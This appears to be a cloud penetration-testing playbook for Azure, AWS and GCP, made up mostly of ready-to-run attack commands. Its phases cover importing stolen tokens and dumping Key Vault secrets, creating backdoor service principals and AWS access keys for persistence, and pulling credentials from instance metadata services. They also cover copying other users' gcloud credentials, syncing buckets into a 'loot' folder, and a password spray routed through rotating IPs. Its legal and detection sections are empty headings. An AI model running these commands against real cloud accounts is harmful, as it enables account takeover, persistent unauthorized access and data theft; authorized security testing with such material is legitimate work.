Cloud Penetration Testing

Cloud Penetration Testing

Purpose

Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.

Prerequisites

Required Tools

# Azure tools
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
AWS CLI

curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install
GCP CLI

curl https://sdk.cloud.google.com | bash
gcloud init
Additional tools

pip install scoutsuite pacu

Required Knowledge

Required Access

Outputs and Deliverables

Core Workflow

Phase 1: Reconnaissance

Gather initial information about target cloud presence:

# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
Azure: Get Tenant ID

curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
Enumerate cloud resources by company name

python3 cloud_enum.py -k targetcompany
Check IP against cloud providers

cat ips.txt | python3 ip2provider.py

Phase 2: Azure Authentication

Authenticate to Azure environments:

# Az PowerShell Module
Import-Module Az
Connect-AzAccount
With credentials (may bypass MFA)

$credential = Get-Credential
Connect-AzAccount -Credential $credential
Import stolen context

Import-AzContext -Profile 'C:\Temp\StolenToken.json'
Export context for persistence

Save-AzContext -Path C:\Temp\AzureAccessToken.json
MSOnline Module

Import-Module MSOnline
Connect-MsolService

Phase 3: Azure Enumeration

Discover Azure resources and permissions:

# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription
Current user role assignments

Get-AzRoleAssignment
List resources

Get-AzResource
Get-AzResourceGroup
Storage accounts

Get-AzStorageAccount
Web applications

Get-AzWebApp
SQL Servers and databases

Get-AzSQLServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
Virtual machines

Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile
List all users

Get-MSolUser -All
List all groups

Get-MSolGroup -All
Global Admins

Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember -GroupObjectId $GUID
Service Principals

Get-MsolServicePrincipal

Phase 4: Azure Exploitation

Exploit Azure misconfigurations:

# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
    $props = @()
    $user | Get-Member | foreach-object{$props+=$_.Name}
    foreach($prop in $props){
        if($user.$prop -like "password"){
            Write-Output ("[]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
        }
    }
}
Execute commands on VMs

Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
Extract VM UserData

$vms = Get-AzVM
$vms.UserData
Dump Key Vault secrets

az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>

Phase 5: Azure Persistence

Establish persistence in Azure:

# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
Add service principal to Global Admin

$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
Login as service principal

$cred = Get-Credential  # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
Create new admin user via CLI

az ad user create --display-name <name> --password <pass> --user-principal-name <upn>

Phase 6: AWS Authentication

Authenticate to AWS environments:

# Configure AWS CLI
aws configure
Enter: Access Key ID, Secret Access Key, Region, Output format
Use specific profile

aws configure --profile target
Test credentials

aws sts get-caller-identity

Phase 7: AWS Enumeration

Discover AWS resources:

# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles
S3 Buckets

aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir
EC2 Instances

aws ec2 describe-instances
RDS Databases

aws rds describe-db-instances --region us-east-1
Lambda Functions

aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>
EKS Clusters

aws eks list-clusters --region us-east-1
Networking

aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections

Phase 8: AWS Exploitation

Exploit AWS misconfigurations:

# Check for public RDS snapshots
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[].DBSnapshotIdentifier
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
AttributeValues = "all" means publicly accessible
Extract Lambda environment variables (may contain secrets)

aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
Access metadata service (from compromised EC2)

curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
IMDSv2 access

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"

Phase 9: AWS Persistence

Establish persistence in AWS:

# List existing access keys
aws iam list-access-keys --user-name <username>
Create backdoor access key

aws iam create-access-key --user-name <username>
Get all EC2 public IPs

for region in $(cat regions.txt); do
    aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
done

Phase 10: GCP Enumeration

Discover GCP resources:

# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list
Account information

gcloud config list
gcloud organizations list
gcloud projects list
IAM Policies

gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>
Enabled services

gcloud services list
Source code repos

gcloud source repos list
gcloud source repos clone <repo>
Compute instances

gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"
Storage buckets

gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local
SQL instances

gcloud sql instances list
gcloud sql databases list --instance <id>
Kubernetes

gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info

Phase 11: GCP Exploitation

Exploit GCP misconfigurations:

# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
Check access scopes

curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
Decrypt data with keyring

gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global
Serverless function analysis

gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100
Find stored credentials

sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list

Quick Reference

Azure Key Commands

AWS Key Commands

GCP Key Commands

Metadata Service URLs

Useful Tools

Constraints and Limitations

Legal Requirements

Technical Limitations

Detection Considerations

Examples

Example 1: Azure Password Spray

Scenario: Test Azure AD password policy

# Using MSOLSpray with FireProx for IP rotation
First create FireProx endpoint

python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create
Spray passwords

Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox

Example 2: AWS S3 Bucket Enumeration

Scenario: Find and access misconfigured S3 buckets

# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt
Check each bucket for contents

while read bucket; do
    echo "Checking: $bucket"
    aws s3 ls s3://$bucket 2>/dev/null
done < buckets.txt
Download interesting bucket

aws s3 sync s3://misconfigured-bucket ./loot/

Example 3: GCP Service Account Compromise

Scenario: Pivot using compromised service account

# Authenticate with service account key
gcloud auth activate-service-account --key-file compromised-sa.json
List accessible projects

gcloud projects list
Enumerate compute instances

gcloud compute instances list --project target-project
Check for SSH keys in metadata

gcloud compute project-info describe --project target-project | grep ssh
SSH to instance

gcloud beta compute ssh instance-name --zone us-central1-a --project target-project

Troubleshooting

References